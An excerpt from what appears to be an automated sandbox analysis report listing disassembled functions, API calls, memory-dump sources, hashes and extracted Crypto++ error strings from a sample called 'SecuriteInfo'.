                                            • Instruction Fuzzy Hash: 5F312971E416189FCB10CBA8CD80BAEB7BAAF85208F34468AE419E7741C775A9808F50
                                            APIs
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
                                            • Instruction ID: 200b333f84ce45a6fd26da78aa40d85e2b46f715335f1e97dff3e1100952ce85
                                            • Opcode Fuzzy Hash: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
                                            • Instruction Fuzzy Hash: 4A314970E416189FCB10CBA8CD80BAEB7BAAF95208F70468AE459F7741C775E9808F50
                                            APIs
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
                                            • Instruction ID: 55fdc04cbe9658084808cc0eed7bc5c70cb166f5a1f13df79b21c57bbfa8f30e
                                            • Opcode Fuzzy Hash: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
                                            • Instruction Fuzzy Hash: 2D3149B0E016189FCB10CBA9CD84BADB7BAAF95308F30858AE458E7741C7759D858F50
                                            APIs
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
                                            • Instruction ID: 7058394d21ab261365077db69bb0a06265cd5ff6b58f8bd75f478bfb744bfe32
                                            • Opcode Fuzzy Hash: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
                                            • Instruction Fuzzy Hash: 9B314CB0E016189FCB14CBA9CD84BADF7BAAF99308F30468AE458E7741C7759D818F50
                                            APIs
                                              • Part of subcall function 6CE94760: __CxxThrowException@8.LIBCMT ref: 6CE947F9
                                            • _memmove.LIBCMT ref: 6CEF0907
                                            • _memmove.LIBCMT ref: 6CEF0936
                                            • _memmove.LIBCMT ref: 6CEF0959
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF0A25
                                            Strings
                                            • PSSR_MEM: message recovery disabled, xrefs: 6CEF09E3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw
                                            • String ID: PSSR_MEM: message recovery disabled
                                            • API String ID: 2655171816-3051149714
                                            • Opcode ID: b6e36fb4b76eac5723700df7b1b9f54c59501c6cf3cf601ef544b1ac3567205b
                                            • Instruction ID: 87122e141820429028009b16de9ce3ccf499fa29878f6f3e74065229f81af938
                                            • Opcode Fuzzy Hash: b6e36fb4b76eac5723700df7b1b9f54c59501c6cf3cf601ef544b1ac3567205b
                                            • Instruction Fuzzy Hash: DBC15B756083819FD714CF28C980B6AB7F5AFC9308F248A5DE59987385DB34E906CB92
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF80EA
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: Max$Min$RandomNumberType$invalid bit length
                                            • API String ID: 3718517217-2498579642
                                            • Opcode ID: 56780f607bfe35366619f71ed012f9411590370b41fd50881e952a948ab98b75
                                            • Instruction ID: ecb4bbaf607751144bc2fdabc1ed060c92dae6ef22fb6640e72b4db3954929aa
                                            • Opcode Fuzzy Hash: 56780f607bfe35366619f71ed012f9411590370b41fd50881e952a948ab98b75
                                            • Instruction Fuzzy Hash: 72C1C1712093809AE334CB28C950BCFBBE5AFDA304F244A1DE5A983791DB749909C763
                                            APIs
                                            • __CreateFrameInfo.LIBCMT ref: 6CEFBEB6
                                              • Part of subcall function 6CEFAB70: __getptd.LIBCMT ref: 6CEFAB7E
                                              • Part of subcall function 6CEFAB70: __getptd.LIBCMT ref: 6CEFAB8C
                                            • __getptd.LIBCMT ref: 6CEFBEC0
                                              • Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
                                              • Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6
                                            • __getptd.LIBCMT ref: 6CEFBECE
                                            • __getptd.LIBCMT ref: 6CEFBEDC
                                            • __getptd.LIBCMT ref: 6CEFBEE7
                                            • _CallCatchBlock2.LIBCMT ref: 6CEFBF0D
                                              • Part of subcall function 6CEFAC15: __CallSettingFrame@12.LIBCMT ref: 6CEFAC61
                                              • Part of subcall function 6CEFBFB4: __getptd.LIBCMT ref: 6CEFBFC3
                                              • Part of subcall function 6CEFBFB4: __getptd.LIBCMT ref: 6CEFBFD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                            • String ID:
                                            • API String ID: 1602911419-0
                                            • Opcode ID: 6993ef6c3590eb18a7f04eb06b3cfc5c7172219aef63ebe96181d22d2ddaf8f3
                                            • Instruction ID: 686814a672b9935c431b5e386cbfdc25bf3b603d636dfc663c9e53a8b5ee28b6
                                            • Opcode Fuzzy Hash: 6993ef6c3590eb18a7f04eb06b3cfc5c7172219aef63ebe96181d22d2ddaf8f3
                                            • Instruction Fuzzy Hash: 8611C971D00609DFDB10DFA4C545ADEBBB0FF04318F208469E824A7750DB389A5A9F50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HERE$HERE$LOOK$LOOK$p<]q$p<]q$Guq
                                            • API String ID: 0-1107190866
                                            • Opcode ID: ffe120279e1329eedb41feedeb19d19f539245c77890ae679fde402bc820c1f1
                                            • Instruction ID: d6ceec967b31a0498af186864351f1d26c24bd7f13bed5eb7c8dce369e84eb8a
                                            • Opcode Fuzzy Hash: ffe120279e1329eedb41feedeb19d19f539245c77890ae679fde402bc820c1f1
                                            • Instruction Fuzzy Hash: 5CA19174E002298FDBA8DF68C994BD9B7B1BB48310F1481E9D54DAB361DB309E85CF50
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC7267
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                            • API String ID: 2005118841-1273958906
                                            • Opcode ID: eb3958809b93d9f113d5275df110b63e2ecf612b879ee247a59b4667385dae6a
                                            • Instruction ID: 4f0865a25d0107c52be3d63b226ece63d8d26f56e9f449f89b0187903082f2da
                                            • Opcode Fuzzy Hash: eb3958809b93d9f113d5275df110b63e2ecf612b879ee247a59b4667385dae6a
                                            • Instruction Fuzzy Hash: CE6191B11083809FD321DB68C884FDBBBE8AF99348F104A1DE19D87741EB75990987A3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 416fa107e01a2f78b6d66e036bfc4c625a85ec30c8e9c61058b368602311fc52
                                            • Instruction ID: a38e9a547432e179357d65790fabdbbc07cdfb1f5e654f55cf4c11bb9b07b076
                                            • Opcode Fuzzy Hash: 416fa107e01a2f78b6d66e036bfc4c625a85ec30c8e9c61058b368602311fc52
                                            • Instruction Fuzzy Hash: 795118716087405BC314CFA5C891A67BBFAAF8938CF248B5DE4E687F41C722E809C755
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 8b46ae1257ffc2fca3f50c7a820314e22527dc0a4d62b212ad336bc3d6d9356c
                                            • Instruction ID: d7db63bd9bf7657e9b44ee61d83eaf5ec27767f96cc8a43368fb7ec9a10c02c0
                                            • Opcode Fuzzy Hash: 8b46ae1257ffc2fca3f50c7a820314e22527dc0a4d62b212ad336bc3d6d9356c
                                            • Instruction Fuzzy Hash: 4051D8713487405BC3108FB5D990AA7BBFAAF8630CF248A5CE5F587B41C726E80D8752
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _strncmptype_info::operator!=
                                            • String ID: ThisPointer:$ValueNames
                                            • API String ID: 1333309372-2375088429
                                            • Opcode ID: 62890d25d09768fb783375e093a3fd0f1ea490fcce27feddcf4fd395d7c4aed1
                                            • Instruction ID: 5323ecd043b171f3aa94834895d3464d0961609bb9365148337a65c6348197d3
                                            • Opcode Fuzzy Hash: 62890d25d09768fb783375e093a3fd0f1ea490fcce27feddcf4fd395d7c4aed1
                                            • Instruction Fuzzy Hash: 7451F971A083455BC314DF69C890E67B7FA9F8A39CF244B5CE4DA87B41C722E809C755
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CED1C1A
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • __CxxThrowException@8.LIBCMT ref: 6CED1CDE
                                            • __CxxThrowException@8.LIBCMT ref: 6CED1D3E
                                            Strings
                                            • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CED1CF0
                                            • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CED1C67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                            • API String ID: 3476068407-3371871069
                                            • Opcode ID: b521874bd94efab972f3686b468aadd6acc3a50d587fc10150ac26d5d9468273
                                            • Instruction ID: bb5fadf982d57b8d1f6bce6dd055f1a69646c72e3ce73cfb28899774c850ddb5
                                            • Opcode Fuzzy Hash: b521874bd94efab972f3686b468aadd6acc3a50d587fc10150ac26d5d9468273
                                            • Instruction Fuzzy Hash: B4513D712087409FD364DF58C890F9AB7F9BFC8714F108A1DE59987790DB74E9098BA2
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB3BCF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy
                                            • String ID: ljl$ljl
                                            • API String ID: 3651546500-1848646690
                                            • Opcode ID: 265d2498b3e4f2bdea9e96b278359b284c30f7d53ccfe030bf661e00504fe3b7
                                            • Instruction ID: 12c06cc213a51f9ac33c9701a67eb298e3cf582454deb32917b04afdb783e5d9
                                            • Opcode Fuzzy Hash: 265d2498b3e4f2bdea9e96b278359b284c30f7d53ccfe030bf661e00504fe3b7
                                            • Instruction Fuzzy Hash: 2A41BC712086019FC611CF18C8C1E6AF7F9FBC9758F244A0EF894A7754DA70EC458BA2
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF913A
                                              • Part of subcall function 6CEF9125: __CxxThrowException@8.LIBCMT ref: 6CEF914F
                                              • Part of subcall function 6CEF9125: std::exception::exception.LIBCMT ref: 6CEF9160
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
